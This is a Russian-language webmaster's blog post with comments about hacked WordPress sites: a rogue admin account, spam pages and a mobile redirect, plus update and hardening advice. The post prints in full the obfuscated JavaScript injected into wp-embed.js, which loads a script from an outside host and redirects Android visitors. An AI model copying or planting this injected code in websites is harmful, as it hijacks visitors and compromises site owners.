Обновляйте свои сайты, всегда обновляйте
В общем мудохаюсь уже третий день.
Сначала взломали часть старых проектов под GGL, которые мирно доживали остатки дней. Причина — старая версия WordPress. Чуваки залили тысячу страниц на сайты, которые даже успели проиндексироваться Гуглом. Но это цветочки. На следующий день я обнаружил, что и трафиковые сайты на одном сервере подверглись нападению киберпреступников.
Причины выясняем. Но скорее всего виноват WordPress. Вчера обнаружил, что на одном сайте появился новый администратор с почтой [email protected] Я тут же его грохнул и сразу же Яндекс начал рапортовать о вредоносном коде на моем сайте. Это был мобильный редирект, как он уже достал. Этот сайт уже второй раз страдает от этой заразы. Если первый раз я был виноват, то во втором случае моей вины нет. Что забавно, Гугл не определил наличие вируса на сайте, просто работает в штатном режиме, Яндекс же больше не показывает сайт в в своей выдаче.
По проблеме нашел такую инфу http://www.cy-pr.com/forum/f80/t81023/ и https://xakep.ru/2015/04/28/wordpress-comments-bug/. Проблема оказывается в комментариях WordPress 4.2, они подвержены XSS взлому.
Короткий вывод — не забрасывайте сайты, обновляйте все вордпрессы, плагины, модули, винду и все остальное, удаляйте ненужные плагины и следите за обновлениями и новостями, если появится какая-то уязвимость про нее начнут писать, а вы должны максимально быстро отреагировать на нее.
В продолжение темы. Вот такой вот код дописали в файл wp-includes/js/wp-embed.js:
document.write('<script type="text/javascript" src="http://kwizzy.biz/?type=js&key=f53a35769505edf"></script>'); eval(function (p, a, c, k, e, d) { e = function (c) { return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/, String)) { while (c--) { d[e(c)] = k[c] || e(c) } k = [function (e) { return d[e] }]; e = function () { return '\\w+' }; c = 1 } ; while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]) } } return p }('5 6(b,d,c){4 a="";c&&(a=w x,a.C(a.m()+h*c),a="; j="+a.A());3.8=b+"="+d+a+"; p=/"}5 g(b){b+="=";f(4 d=3.8.s(";"),c=0;c<d.2;c++){f(4 a=d[c];" "==a.k(0);)a=a.e(1,a.2);l(0==a.t(b))7 a.e(b.2,a.2)}7 B}g("9")||(6("9","1",1),y.z.G(/(v)/i)&&(3.F.E="u://n-o.r/q/?D"));', 43, 43, '||length|document|var|function|createCookie|return|cookie|ya|||||substring|for|readCookie|864E5||expires|charAt|if|getTime|validate|js|path|inc|ru|split|indexOf|http|android|new|Date|navigator|userAgent|toGMTString|null|setTime|upd|href|location|match'.split('|'), 0, {}));
seoonly.ru
27 января 2016Руки ноги поотрывать тем кто это делает!
s37dap42x
27 января 2016Вротмнепресс дырявый, бля, постоянно в нем баги находят. У меня тоже всякая фигня несколько лет назад творилась, со взломами и заливками. Никак дыру не мог найти долгое время, пока не снес весь движок с плагинами (кроме БД). Затем залил все заново на чистенький хостинг. Стало годно.
Skarui
27 января 2016Не люблю Вордпресс. Работал с ним. Все на косылях делать приходится. Такая же рвань как и Битрикс практически. Лично я уважаю MODx и PHP Slim
Archil
27 января 2016Был у меня опыт с MODx, там дела еще хуже. Его ломали, даже когда все обновлялось стабильно. Но сама идеология мне очень понравилась.
А WordPress хорош тем, что он все умеет и все может.
С PHP Slim не знаком, глянем, спасибо.
Линк
27 января 2016Спасибо, пошел обновлю. Старый снесу вообще нафик.
ВебмастерОК
27 января 2016По ходу закон кармы сработал быстро и прямо, в ответ на твоё «навреди соседу», бывает и так.
Archil
28 января 2016Скорее всего. Придется нафиг бросить эти интернеты, идти в монахи, становиться отшельником и тогда карма очистится.
YoS
1 февраля 2016Давно интересуюсь темой защиты сайтов на WP. Советую вам как минимум следующее:
1. Сделать доступ к wp-login.php только для определенных IP адресов, либо по заданным учетным данным.
2. Плагин limit login atempt (ограничивает кол-во неправильных авторизаций)
3. На стороне хостинга (если есть такая возможность), настроить промежуточную страницу с вводом капчи.
4. Google captcha на страницу авторизации админки и на форму комментариев.
Совокупность этих методов «сбреет» около 95% попыток атак на сайт.
Archil
1 февраля 2016Ух, защита круче чем в Харренхолле, только вот если дракон нападет то уже ничего не поможет.
Советы дельные, спасибо.
YoS
1 февраля 2016Ну разве что в качестве дракона будет DDOS атака )).